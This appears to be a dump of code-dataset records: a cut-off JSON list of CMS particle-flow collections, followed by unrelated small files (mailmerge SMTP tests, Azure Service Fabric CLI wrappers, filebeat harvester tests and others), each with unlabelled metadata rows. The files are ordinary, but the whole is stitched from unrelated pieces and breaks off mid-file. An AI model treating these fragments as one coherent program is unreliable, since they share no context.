"instance": "particleFlowRecHitHO",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowTmp",
"container": "recoPFCandidates",
"desc": "No documentation"
},
{
"instance": "particleFlow",
"container": "recoPFCandidates",
"desc": "No documentation"
},
{
"instance": "particleFlow",
"container": "*",
"desc": "No documentation"
},
{
"instance": "particleFlow",
"container": "*",
"desc": "No documentation"
},
{
"instance": "pfElectronTranslator",
"container": "reco::CaloClusterCollection",
"desc": "Basic clusters of PF electron super-clusters"
},
{
"instance": "pfElectronTranslator",
"container": "reco::SuperClusterCollection",
"desc": "Particle Flow Super-clusters of PF-electrons"
},
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::CaloClusterCollection",
"desc": "Basic clusters of PF photon super-clusters"
},
{
"instance": "pfElectronTranslator",
"container": "reco::PreshowerClusterCollection",
"desc": "Preshower clusters of PF electron super-clusters"
},
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::SuperClusterCollection",
"desc": "Particle Flow Super-clusters of photons imported in PF"
},
{
"instance": "pfPhotonTranslator:pfphot",
"container": "reco::PreshowerClusterCollection",
"desc": "Preshower clusters of PF photon super-clusters"
}
]
},
"reco": {
"title": "RecoParticleFlow collections (in RECO only)",
"data": [
{
"instance": "particleFlowPtrs",
"container": "*",
"desc": "No documentation"
},
{
"instance": "particleFlowTmpPtrs",
"container": "*",
"desc": "No documentation"
},
{
"instance": "pfPhotonTranslator",
"container": "*",
"desc": "No documentation"
},
{
"instance": "particleFlow",
"container": "*",
"desc": "No documentation"
},
{
"instance": "particleFlow",
"container": "*",
"desc": "No documentation"
},
{
"instance": "trackerDrivenElectronSeeds",
"container": "reco::PreIdCollection",
"desc": "Information on the tracker-driven electron seed"
},
{
"instance": "particleFlowClusterHCAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterECAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFEM",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHO",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterPS",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHFHAD",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitHCAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitECAL",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitPS",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowRecHitHO",
"container": "recoPFRecHits",
"desc": "No documentation"
},
{
"instance": "particleFlowClusterHCAL",
"container": "recoPFClusters",
"desc": "HCAL clusters"
},
{
"instance": "particleFlowClusterECAL",
"container": "recoPFClusters",
"desc": "ECAL clusters"
},
{
"instance": "particleFlowClusterPS",
"container": "recoPFClusters",
"desc": "Preshower clusters"
},
{
"instance": "particleFlowClusterHO",
"container": "recoPFClusters",
"desc": "No documentation"
},
{
"instance": "particleFlow",
"container": "recoPFCandidates",
"desc": "Particle Flow Candidates (refers to reco::PFBlock`s)"
},
{
"instance": "particleFlowBlock",
"container": "recoPFBlocks",
"desc": "Particle Flow Blocks (refers to reco::Track`s and reco::PFCluster`s)"
},
{
"instance": "particleFlowTmp",
"container": "recoPFCandidates",
"desc": "No documentation"
},
{
"instance": "particleFlowTmp",
"container": "recoPFCandidates",
"desc": "No documentation"
},
{
"instance": "pfElectronTranslator",
"container": "reco::GsfElectronCollection",
"desc": "PF electron reconstructed translated in the GsfElectron format"
},
{
"instance": "particleFlowDisplacedVertex",
"container": "recoPFDisplacedVertexs",
"desc": "No documentation"
}
]
}
}
| 27.731377 | 100 | 0.545462 | 765 | 12,285 | 8.759477 | 0.133333 | 0.053723 | 0.170124 | 0.233696 | 0.90494 | 0.863602 | 0.801373 | 0.760036 | 0.724071 | 0.703626 | 0 | 0.000703 | 0.304925 | 12,285 | 442 | 101 | 27.794118 | 0.78405 | 0.012617 | 0 | 0.553241 | 0 | 0 | 0.5897 | 0.143176 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009259 | 0 | 0.009259 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f96dad77337ae131f79ec1e8d7327a12794d9381 | 177 | py | Python | dxtbx/libtbx_refresh.py | jbeilstenedmands/cctbx_project | c228fb15ab10377f664c39553d866281358195aa | [
"BSD-3-Clause-LBNL"
] | null | null | null | dxtbx/libtbx_refresh.py | jbeilstenedmands/cctbx_project | c228fb15ab10377f664c39553d866281358195aa | [
"BSD-3-Clause-LBNL"
] | null | null | null | dxtbx/libtbx_refresh.py | jbeilstenedmands/cctbx_project | c228fb15ab10377f664c39553d866281358195aa | [
"BSD-3-Clause-LBNL"
] | null | null | null | from __future__ import absolute_import, division, print_function
import libtbx.pkg_utils
libtbx.pkg_utils.require('mock', '>=2.0')
libtbx.pkg_utils.require('pytest', '>=3.1')
| 25.285714 | 64 | 0.768362 | 26 | 177 | 4.884615 | 0.653846 | 0.212598 | 0.330709 | 0.330709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02454 | 0.079096 | 177 | 6 | 65 | 29.5 | 0.754601 | 0 | 0 | 0 | 0 | 0 | 0.112994 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.25 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
f9ab940ee887953fd5ae04c2fd9f7c5e32894975 | 86 | py | Python | magda/module/__init__.py | p-mielniczuk/magda | 6359fa5721b4e27bd98f2c6af0e858b476645618 | [
"Apache-2.0"
] | 8 | 2021-02-25T14:00:25.000Z | 2022-03-10T00:32:43.000Z | magda/module/__init__.py | p-mielniczuk/magda | 6359fa5721b4e27bd98f2c6af0e858b476645618 | [
"Apache-2.0"
] | 22 | 2021-03-24T11:56:47.000Z | 2021-11-02T15:09:50.000Z | magda/module/__init__.py | p-mielniczuk/magda | 6359fa5721b4e27bd98f2c6af0e858b476645618 | [
"Apache-2.0"
] | 6 | 2021-04-06T07:26:47.000Z | 2021-12-07T18:55:52.000Z | from magda.module.module import Module
from magda.module.factory import ModuleFactory
| 28.666667 | 46 | 0.860465 | 12 | 86 | 6.166667 | 0.5 | 0.243243 | 0.405405 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 86 | 2 | 47 | 43 | 0.948718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ddf44e2b2d35f42e107a757ffb9e74cc6eaa38ad | 86 | py | Python | tests/test_api.py | sanchos2/nautilus | 587ba8518a5baf894ed5d8034ffef582ea6023f1 | [
"MIT"
] | null | null | null | tests/test_api.py | sanchos2/nautilus | 587ba8518a5baf894ed5d8034ffef582ea6023f1 | [
"MIT"
] | 5 | 2020-05-02T04:18:54.000Z | 2020-06-17T16:27:15.000Z | tests/test_api.py | sanchos2/nautilus | 587ba8518a5baf894ed5d8034ffef582ea6023f1 | [
"MIT"
] | null | null | null | import pytest
from webapp.api.views import *
def test_grscaner_process():
pass
| 10.75 | 30 | 0.744186 | 12 | 86 | 5.166667 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186047 | 86 | 7 | 31 | 12.285714 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
fb3bdcc0b8dd0fd38f6e8de058e1df695506edde | 126 | py | Python | run.py | SaberSz/WeByte | 3f88d572990b8342d2f28065fbb1d092449bf0ea | [
"MIT"
] | null | null | null | run.py | SaberSz/WeByte | 3f88d572990b8342d2f28065fbb1d092449bf0ea | [
"MIT"
] | null | null | null | run.py | SaberSz/WeByte | 3f88d572990b8342d2f28065fbb1d092449bf0ea | [
"MIT"
] | null | null | null | from CodeArena import app
if __name__ == '__main__':
# from CodeArena import app
app.run(debug=True)
# app.run()
| 18 | 31 | 0.65873 | 17 | 126 | 4.411765 | 0.588235 | 0.346667 | 0.506667 | 0.586667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.230159 | 126 | 6 | 32 | 21 | 0.773196 | 0.277778 | 0 | 0 | 0 | 0 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
34959701fde34380130e97b7092da36a8e262341 | 12,745 | py | Python | tests/test_sendmail_client.py | captn3m0/mailmerge | 6c40c252154cd3360a7dc054619ae8919150974c | [
"MIT"
] | 1 | 2021-08-14T19:17:44.000Z | 2021-08-14T19:17:44.000Z | tests/test_sendmail_client.py | captn3m0/mailmerge | 6c40c252154cd3360a7dc054619ae8919150974c | [
"MIT"
] | 1 | 2021-01-05T21:04:42.000Z | 2021-01-05T21:04:42.000Z | tests/test_sendmail_client.py | captn3m0/mailmerge | 6c40c252154cd3360a7dc054619ae8919150974c | [
"MIT"
] | null | null | null | """
Tests for SendmailClient.
Andrew DeOrio <awdeorio@umich.edu>
"""
import textwrap
import socket
import smtplib
import pytest
import future.backports.email as email
import future.backports.email.parser # pylint: disable=unused-import
from mailmerge import SendmailClient, MailmergeError
try:
from unittest import mock # Python 3
except ImportError:
import mock # Python 2
# We're going to use mock_SMTP because it mimics the real SMTP library
# pylint: disable=invalid-name
@mock.patch('smtplib.SMTP')
def test_smtp(mock_SMTP, tmp_path):
"""Verify SMTP library calls."""
config_path = tmp_path/"server.conf"
config_path.write_text(textwrap.dedent(u"""\
[smtp_server]
host = open-smtp.example.com
port = 25
"""))
sendmail_client = SendmailClient(
config_path,
dry_run=False,
)
message = email.message_from_string(u"""
TO: to@test.com
SUBJECT: Testing mailmerge
FROM: from@test.com
Hello world
""")
sendmail_client.sendmail(
sender="from@test.com",
recipients=["to@test.com"],
message=message,
)
# Mock smtp object with function calls recorded
smtp = mock_SMTP.return_value.__enter__.return_value
assert smtp.sendmail.call_count == 1
@mock.patch('smtplib.SMTP')
@mock.patch('getpass.getpass')
def test_dry_run(mock_getpass, mock_SMTP, tmp_path):
"""Verify no sendmail() calls when dry_run=True."""
config_path = tmp_path/"server.conf"
config_path.write_text(textwrap.dedent(u"""\
[smtp_server]
host = open-smtp.example.com
port = 25
security = Never
"""))
sendmail_client = SendmailClient(
config_path,
dry_run=True,
)
message = email.message_from_string(u"""
TO: test@test.com
SUBJECT: Testing mailmerge
FROM: test@test.com
Hello world
""")
sendmail_client.sendmail(
sender="from@test.com",
recipients=["to@test.com"],
message=message,
)
# Verify SMTP wasn't called and password wasn't used
assert mock_getpass.call_count == 0
smtp = mock_SMTP.return_value.__enter__.return_value
assert smtp.sendmail.call_count == 0
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('getpass.getpass')
def test_no_dry_run(mock_getpass, mock_SMTP_SSL, tmp_path):
"""Verify --no-dry-run calls SMTP sendmail()."""
config_path = tmp_path/"server.conf"
config_path.write_text(textwrap.dedent(u"""\
[smtp_server]
host = open-smtp.example.com
port = 465
security = SSL/TLS
username = admin
"""))
sendmail_client = SendmailClient(config_path, dry_run=False)
message = email.message_from_string(u"""
TO: test@test.com
SUBJECT: Testing mailmerge
FROM: test@test.com
Hello world
""")
# Mock the password entry
mock_getpass.return_value = "password"
# Send a message
sendmail_client.sendmail(
sender="from@test.com",
recipients=["to@test.com"],
message=message,
)
# Verify function calls for password and sendmail()
assert mock_getpass.call_count == 1
smtp = mock_SMTP_SSL.return_value.__enter__.return_value
assert smtp.sendmail.call_count == 1
def test_bad_config_key(tmp_path):
"""Verify config file with bad key throws an exception."""
config_path = tmp_path/"server.conf"
config_path.write_text(textwrap.dedent(u"""\
[smtp_server]
badkey = open-smtp.example.com
"""))
with pytest.raises(MailmergeError):
SendmailClient(config_path, dry_run=True)
def test_security_error(tmp_path):
"""Verify config file with bad security type throws an exception."""
config_path = tmp_path/"server.conf"
config_path.write_text(textwrap.dedent(u"""\
[smtp_server]
host = smtp.mail.umich.edu
port = 465
security = bad_value
username = YOUR_USERNAME_HERE
"""))
with pytest.raises(MailmergeError):
SendmailClient(config_path, dry_run=False)
@mock.patch('smtplib.SMTP')
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('getpass.getpass')
def test_security_open(mock_getpass, mock_SMTP_SSL, mock_SMTP, tmp_path):
"""Verify open (Never) security configuration."""
# Config for no security SMTP server
config_path = tmp_path/"server.conf"
config_path.write_text(textwrap.dedent(u"""\
[smtp_server]
host = open-smtp.example.com
port = 25
"""))
# Simple template
sendmail_client = SendmailClient(config_path, dry_run=False)
message = email.message_from_string(u"Hello world")
# Send a message
sendmail_client.sendmail(
sender="test@test.com",
recipients=["test@test.com"],
message=message,
)
# Verify SMTP library calls
assert mock_getpass.call_count == 0
assert mock_SMTP.call_count == 1
assert mock_SMTP_SSL.call_count == 0
smtp = mock_SMTP.return_value.__enter__.return_value
assert smtp.sendmail.call_count == 1
assert smtp.login.call_count == 0
@mock.patch('smtplib.SMTP')
def test_security_open_legacy(mock_SMTP, tmp_path):
"""Verify legacy "security = Never" configuration."""
# Config SMTP server with "security = Never" legacy option
config_path = tmp_path/"server.conf"
config_path.write_text(textwrap.dedent(u"""\
[smtp_server]
host = open-smtp.example.com
port = 25
security = Never
"""))
# Simple template
sendmail_client = SendmailClient(config_path, dry_run=False)
message = email.message_from_string(u"Hello world")
# Send a message
sendmail_client.sendmail(
sender="test@test.com",
recipients=["test@test.com"],
message=message,
)
# Verify SMTP library calls
smtp = mock_SMTP.return_value.__enter__.return_value
assert smtp.sendmail.call_count == 1
@mock.patch('smtplib.SMTP')
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('getpass.getpass')
def test_security_starttls(mock_getpass, mock_SMTP_SSL, mock_SMTP, tmp_path):
"""Verify open (Never) security configuration."""
# Config for STARTTLS SMTP server
config_path = tmp_path/"server.conf"
config_path.write_text(textwrap.dedent(u"""\
[smtp_server]
host = newman.eecs.umich.edu
port = 25
security = STARTTLS
username = YOUR_USERNAME_HERE
"""))
# Simple template
sendmail_client = SendmailClient(config_path, dry_run=False)
message = email.message_from_string(u"Hello world")
# Mock the password entry
mock_getpass.return_value = "password"
# Send a message
sendmail_client.sendmail(
sender="test@test.com",
recipients=["test@test.com"],
message=message,
)
# Verify SMTP library calls
assert mock_getpass.call_count == 1
assert mock_SMTP.call_count == 1
assert mock_SMTP_SSL.call_count == 0
smtp = mock_SMTP.return_value.__enter__.return_value
assert smtp.ehlo.call_count == 2
assert smtp.starttls.call_count == 1
assert smtp.login.call_count == 1
assert smtp.sendmail.call_count == 1
@mock.patch('smtplib.SMTP')
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('getpass.getpass')
def test_security_ssl(mock_getpass, mock_SMTP_SSL, mock_SMTP, tmp_path):
"""Verify open (Never) security configuration."""
# Config for SSL SMTP server
config_path = tmp_path/"server.conf"
config_path.write_text(textwrap.dedent(u"""\
[smtp_server]
host = smtp.mail.umich.edu
port = 465
security = SSL/TLS
username = YOUR_USERNAME_HERE
"""))
# Simple template
sendmail_client = SendmailClient(config_path, dry_run=False)
message = email.message_from_string(u"Hello world")
# Mock the password entry
mock_getpass.return_value = "password"
# Send a message
sendmail_client.sendmail(
sender="test@test.com",
recipients=["test@test.com"],
message=message,
)
# Verify SMTP library calls
assert mock_getpass.call_count == 1
assert mock_SMTP.call_count == 0
assert mock_SMTP_SSL.call_count == 1
smtp = mock_SMTP_SSL.return_value.__enter__.return_value
assert smtp.ehlo.call_count == 0
assert smtp.starttls.call_count == 0
assert smtp.login.call_count == 1
assert smtp.sendmail.call_count == 1
def test_missing_username(tmp_path):
"""Verify exception on missing username."""
config_path = tmp_path/"server.conf"
config_path.write_text(textwrap.dedent(u"""\
[smtp_server]
host = smtp.mail.umich.edu
port = 465
security = SSL/TLS
"""))
with pytest.raises(MailmergeError):
SendmailClient(config_path, dry_run=False)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('getpass.getpass')
def test_smtp_login_error(mock_getpass, mock_SMTP_SSL, tmp_path):
"""Login failure."""
# Config for SSL SMTP server
config_path = tmp_path/"server.conf"
config_path.write_text(textwrap.dedent(u"""\
[smtp_server]
host = smtp.gmail.com
port = 465
security = SSL/TLS
username = awdeorio
"""))
# Simple template
sendmail_client = SendmailClient(config_path, dry_run=False)
message = email.message_from_string(u"Hello world")
# Mock the password entry
mock_getpass.return_value = "password"
# Configure SMTP login() to raise an exception
mock_SMTP_SSL.return_value.__enter__.return_value.login = mock.Mock(
side_effect=smtplib.SMTPAuthenticationError(
code=535,
msg=(
"5.7.8 Username and Password not accepted. Learn more at "
"5.7.8 https://support.google.com/mail/?p=BadCredentials "
"xyzxyz.32 - gsmtp"
)
)
)
# Send a message
with pytest.raises(MailmergeError) as err:
sendmail_client.sendmail(
sender="test@test.com",
recipients=["test@test.com"],
message=message,
)
# Verify exception string
assert "smtp.gmail.com:465 failed to authenticate user 'awdeorio'" in\
str(err.value)
assert "535" in str(err.value)
assert (
"5.7.8 Username and Password not accepted. Learn more at "
"5.7.8 https://support.google.com/mail/?p=BadCredentials "
"xyzxyz.32 - gsmtp"
) in str(err.value)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('getpass.getpass')
def test_smtp_sendmail_error(mock_getpass, mock_SMTP_SSL, tmp_path):
"""Failure during SMTP protocol."""
# Config for SSL SMTP server
config_path = tmp_path/"server.conf"
config_path.write_text(textwrap.dedent(u"""\
[smtp_server]
host = smtp.gmail.com
port = 465
security = SSL/TLS
username = awdeorio
"""))
# Simple template
sendmail_client = SendmailClient(config_path, dry_run=False)
message = email.message_from_string(u"Hello world")
# Mock the password entry
mock_getpass.return_value = "password"
# Configure SMTP sendmail() to raise an exception
mock_SMTP_SSL.return_value.__enter__.return_value.sendmail = mock.Mock(
side_effect=smtplib.SMTPException("Dummy error message")
)
# Send a message
with pytest.raises(MailmergeError) as err:
sendmail_client.sendmail(
sender="test@test.com",
recipients=["test@test.com"],
message=message,
)
# Verify exception string
assert "Dummy error message" in str(err.value)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('getpass.getpass')
def test_socket_error(mock_getpass, mock_SMTP_SSL, tmp_path):
"""Failed socket connection."""
# Config for SSL SMTP server
config_path = tmp_path/"server.conf"
config_path.write_text(textwrap.dedent(u"""\
[smtp_server]
host = smtp.gmail.com
port = 465
security = SSL/TLS
username = awdeorio
"""))
# Simple template
sendmail_client = SendmailClient(config_path, dry_run=False)
message = email.message_from_string(u"Hello world")
# Mock the password entry
mock_getpass.return_value = "password"
# Configure SMTP_SSL constructor to raise an exception
mock_SMTP_SSL.return_value.__enter__ = mock.Mock(
side_effect=socket.error("Dummy error message")
)
# Send a message
with pytest.raises(MailmergeError) as err:
sendmail_client.sendmail(
sender="test@test.com",
recipients=["test@test.com"],
message=message,
)
# Verify exception string
assert "Dummy error message" in str(err.value)
| 29.43418 | 77 | 0.663162 | 1,613 | 12,745 | 5.024799 | 0.107874 | 0.048118 | 0.024429 | 0.032079 | 0.858112 | 0.83467 | 0.811845 | 0.789636 | 0.771129 | 0.763726 | 0 | 0.008448 | 0.229109 | 12,745 | 432 | 78 | 29.502315 | 0.816489 | 0.141703 | 0 | 0.762376 | 0 | 0 | 0.28648 | 0.013585 | 0 | 0 | 0 | 0 | 0.09901 | 1 | 0.042904 | false | 0.09571 | 0.033003 | 0 | 0.075908 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
5518c7fe6b8786208a806aab1825f452f29fb4dc | 2,302 | py | Python | pyaz/sf/managed_node_type/node/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | null | null | null | pyaz/sf/managed_node_type/node/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | null | null | null | pyaz/sf/managed_node_type/node/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | 1 | 2022-02-03T09:12:01.000Z | 2022-02-03T09:12:01.000Z | from .... pyaz_utils import _call_az
def reimage(cluster_name, node_name, resource_group, force=None):
'''
Reimage nodes of a node type.
Required Parameters:
- cluster_name -- Specify the name of the cluster, if not given it will be same as resource group name
- node_name -- list of target nodes to perform the operation.
- resource_group -- Specify the resource group name. You can configure the default group using `az configure --defaults group=<name>`
Optional Parameters:
- force -- Using this flag will force the operation even if service fabric is unable to disable the nodes. Use with caution as this might cause data loss if stateful workloads are running on the node.
'''
return _call_az("az sf managed-node-type node reimage", locals())
def restart(cluster_name, node_name, resource_group, force=None):
'''
Restart nodes of a node type.
Required Parameters:
- cluster_name -- Specify the name of the cluster, if not given it will be same as resource group name
- node_name -- list of target nodes to perform the operation.
- resource_group -- Specify the resource group name. You can configure the default group using `az configure --defaults group=<name>`
Optional Parameters:
- force -- Using this flag will force the operation even if service fabric is unable to disable the nodes. Use with caution as this might cause data loss if stateful workloads are running on the node.
'''
return _call_az("az sf managed-node-type node restart", locals())
def delete(cluster_name, node_name, resource_group, force=None):
'''
Delete nodes of a node type.
Required Parameters:
- cluster_name -- Specify the name of the cluster, if not given it will be same as resource group name
- node_name -- list of target nodes to perform the operation.
- resource_group -- Specify the resource group name. You can configure the default group using `az configure --defaults group=<name>`
Optional Parameters:
- force -- Using this flag will force the operation even if service fabric is unable to disable the nodes. Use with caution as this might cause data loss if stateful workloads are running on the node.
'''
return _call_az("az sf managed-node-type node delete", locals())
| 48.978723 | 204 | 0.730235 | 348 | 2,302 | 4.752874 | 0.198276 | 0.094317 | 0.043531 | 0.034462 | 0.932285 | 0.932285 | 0.932285 | 0.932285 | 0.85792 | 0.85792 | 0 | 0 | 0.20417 | 2,302 | 46 | 205 | 50.043478 | 0.902838 | 0.747176 | 0 | 0 | 0 | 0 | 0.231102 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0.142857 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
9b9adbede115a898f64ec80d2fb7233aa34ccc40 | 3,904 | py | Python | filebeat/tests/system/test_harvester.py | douaejeouit/Docker_metricbeat | e6c80264d3686939fc4451c358fb8ae8d973650c | [
"Apache-2.0"
] | 3 | 2017-08-08T20:08:53.000Z | 2021-09-16T14:38:00.000Z | filebeat/tests/system/test_harvester.py | douaejeouit/Docker_metricbeat | e6c80264d3686939fc4451c358fb8ae8d973650c | [
"Apache-2.0"
] | 1 | 2016-07-19T09:33:37.000Z | 2016-07-19T10:29:54.000Z | filebeat/tests/system/test_harvester.py | douaejeouit/Docker_metricbeat | e6c80264d3686939fc4451c358fb8ae8d973650c | [
"Apache-2.0"
] | 7 | 2017-11-24T23:58:46.000Z | 2020-03-31T15:57:07.000Z | from filebeat import BaseTest
import os
import socket
"""
Test Harvesters
"""
class Test(BaseTest):
def test_close_renamed(self):
"""
Checks that a file is closed when its renamed / rotated
"""
self.render_config_template(
path=os.path.abspath(self.working_dir) + "/log/test.log",
close_renamed="true",
scan_frequency="0.1s"
)
os.mkdir(self.working_dir + "/log/")
testfile1 = self.working_dir + "/log/test.log"
testfile2 = self.working_dir + "/log/test.log.rotated"
file = open(testfile1, 'w')
iterations1 = 5
for n in range(0, iterations1):
file.write("rotation file")
file.write("\n")
file.close()
filebeat = self.start_beat()
# Let it read the file
self.wait_until(
lambda: self.output_has(lines=iterations1), max_timeout=10)
os.rename(testfile1, testfile2)
file = open(testfile1, 'w', 0)
file.write("Hello World\n")
file.close()
# Wait until error shows up
self.wait_until(
lambda: self.log_contains(
"Closing because close_renamed is enabled"),
max_timeout=15)
# Let it read the file
self.wait_until(
lambda: self.output_has(lines=iterations1 + 1), max_timeout=10)
filebeat.check_kill_and_wait()
data = self.get_registry()
# Make sure new file was picked up. As it has the same file name,
# one entry for the new and one for the old should exist
assert len(data) == 2
def test_close_removed(self):
"""
Checks that a file is closed if removed
"""
self.render_config_template(
path=os.path.abspath(self.working_dir) + "/log/test.log",
close_removed="true",
scan_frequency="0.1s"
)
os.mkdir(self.working_dir + "/log/")
testfile1 = self.working_dir + "/log/test.log"
file = open(testfile1, 'w')
iterations1 = 5
for n in range(0, iterations1):
file.write("rotation file")
file.write("\n")
file.close()
filebeat = self.start_beat()
# Let it read the file
self.wait_until(
lambda: self.output_has(lines=iterations1), max_timeout=10)
os.remove(testfile1)
# Wait until error shows up on windows
self.wait_until(
lambda: self.log_contains(
"Closing because close_removed is enabled"),
max_timeout=15)
filebeat.check_kill_and_wait()
data = self.get_registry()
# Make sure the state for the file was persisted
assert len(data) == 1
def test_close_eof(self):
"""
Checks that a file is closed if eof is reached
"""
self.render_config_template(
path=os.path.abspath(self.working_dir) + "/log/test.log",
close_eof="true",
scan_frequency="0.1s"
)
os.mkdir(self.working_dir + "/log/")
testfile1 = self.working_dir + "/log/test.log"
file = open(testfile1, 'w')
iterations1 = 5
for n in range(0, iterations1):
file.write("rotation file")
file.write("\n")
file.close()
filebeat = self.start_beat()
# Let it read the file
self.wait_until(
lambda: self.output_has(lines=iterations1), max_timeout=10)
# Wait until error shows up on windows
self.wait_until(
lambda: self.log_contains(
"Closing because close_eof is enabled"),
max_timeout=15)
filebeat.check_kill_and_wait()
data = self.get_registry()
# Make sure the state for the file was persisted
assert len(data) == 1
| 26.201342 | 75 | 0.567623 | 479 | 3,904 | 4.48643 | 0.221294 | 0.051187 | 0.065147 | 0.079107 | 0.805956 | 0.786412 | 0.775244 | 0.76268 | 0.735691 | 0.735691 | 0 | 0.019885 | 0.330174 | 3,904 | 148 | 76 | 26.378378 | 0.801912 | 0.13832 | 0 | 0.72619 | 0 | 0 | 0.096903 | 0.00644 | 0 | 0 | 0 | 0 | 0.035714 | 1 | 0.035714 | false | 0 | 0.035714 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
32d7866d4d9e6ebcb90e1b1bf355fc6a65c629ff | 19,373 | py | Python | tests/payment/test_PaymentGateway.py | BoostryJP/ibet-SmartContract | dc3f73a708ef145e7200ce58fce4e8171e21d3c2 | [
"Apache-2.0"
] | 10 | 2021-06-12T08:43:50.000Z | 2022-02-17T14:24:48.000Z | tests/payment/test_PaymentGateway.py | BoostryJP/ibet-SmartContract | dc3f73a708ef145e7200ce58fce4e8171e21d3c2 | [
"Apache-2.0"
] | 44 | 2021-04-11T06:43:10.000Z | 2022-03-30T12:42:32.000Z | tests/payment/test_PaymentGateway.py | BoostryJP/ibet-SmartContract | dc3f73a708ef145e7200ce58fce4e8171e21d3c2 | [
"Apache-2.0"
] | 1 | 2022-03-09T07:27:57.000Z | 2022-03-09T07:27:57.000Z | """
Copyright BOOSTRY Co., Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
import brownie
